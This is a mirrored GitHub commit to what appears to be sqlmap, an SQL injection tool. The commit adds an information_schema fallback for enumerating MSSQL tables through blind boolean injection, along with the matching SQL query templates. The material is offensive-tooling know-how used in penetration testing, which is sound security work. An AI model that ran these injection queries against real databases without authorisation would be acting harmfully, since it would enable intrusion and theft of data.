Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit fecdce5

Browse files
stamparmstamparm
committed
implemented --tables over information_schema for MSSQL as a failover option for BOOLEAN technique too
1 parent ff52931 commit fecdce5

2 files changed

Lines changed: 13 additions & 8 deletions

File tree

plugins/dbms/mssqlserver/enumeration.py

Lines changed: 12 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -115,20 +115,25 @@ def getTables(self):
115115
infoMsg += "database '%s'" % db
116116
logger.info(infoMsg)
117117

118-
query = rootQuery.blind.count % db
119-
count = inject.getValue(query, inband=False, error=False, charsetType=2)
118+
for query in (rootQuery.blind.count, rootQuery.blind.count2):
119+
_ = query % db
120+
count = inject.getValue(_, inband=False, error=False, charsetType=2)
121+
if not isNoneValue(count):
122+
break
120123

121124
if not isNumPosStrValue(count):
122-
warnMsg = "unable to retrieve the number of "
123-
warnMsg += "tables for database '%s'" % db
124-
logger.warn(warnMsg)
125+
if count != "0":
126+
warnMsg = "unable to retrieve the number of "
127+
warnMsg += "tables for database '%s'" % db
128+
logger.warn(warnMsg)
125129
continue
126130

127131
tables = []
128132

129133
for index in xrange(int(count)):
130-
query = rootQuery.blind.query.replace("%s", db) % index
131-
table = inject.getValue(query, inband=False, error=False)
134+
_ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2).replace("%s", db) % index
135+
136+
table = inject.getValue(_, inband=False, error=False)
132137
kb.hintValue = table
133138
table = safeSQLIdentificatorNaming(table, True)
134139
tables.append(table)

xml/queries.xml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -185,7 +185,7 @@
185185
</dbs>
186186
<tables>
187187
<inband query="SELECT %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE xtype IN ('u', 'v')" query2="SELECT table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s'"/>
188-
<blind query="SELECT TOP 1 %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE xtype IN ('u', 'v') AND %s..sysusers.name+'.'+%s..sysobjects.name NOT IN (SELECT TOP %d %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE xtype IN ('u', 'v') ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name) ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE xtype IN ('u','v')"/>
188+
<blind query="SELECT TOP 1 %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE xtype IN ('u', 'v') AND %s..sysusers.name+'.'+%s..sysobjects.name NOT IN (SELECT TOP %d %s..sysusers.name+'.'+%s..sysobjects.name FROM %s..sysobjects INNER JOIN %s..sysusers ON %s..sysobjects.uid = %s..sysusers.uid WHERE xtype IN ('u', 'v') ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name) ORDER BY %s..sysusers.name+'.'+%s..sysobjects.name" count="SELECT LTRIM(STR(COUNT(name))) FROM %s..sysobjects WHERE xtype IN ('u','v')" query2="SELECT TOP 1 table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' AND table_schema+'.'+table_name NOT IN (SELECT TOP %d table_schema+'.'+table_name FROM information_schema.tables WHERE table_catalog='%s' ORDER BY table_schema+'.'+table_name) ORDER BY table_schema+'.'+table_name" count2="SELECT LTRIM(STR(COUNT(table_name))) FROM information_schema.tables WHERE table_catalog='%s'"/>
189189
</tables>
190190
<columns>
191191
<inband query="SELECT %s..syscolumns.name,TYPE_NAME(%s..syscolumns.xtype) FROM %s..syscolumns,%s..sysobjects WHERE %s..syscolumns.id=%s..sysobjects.id AND %s..sysobjects.name='%s'" condition="[DB]..syscolumns.name"/>

0 commit comments

Comments
 (0)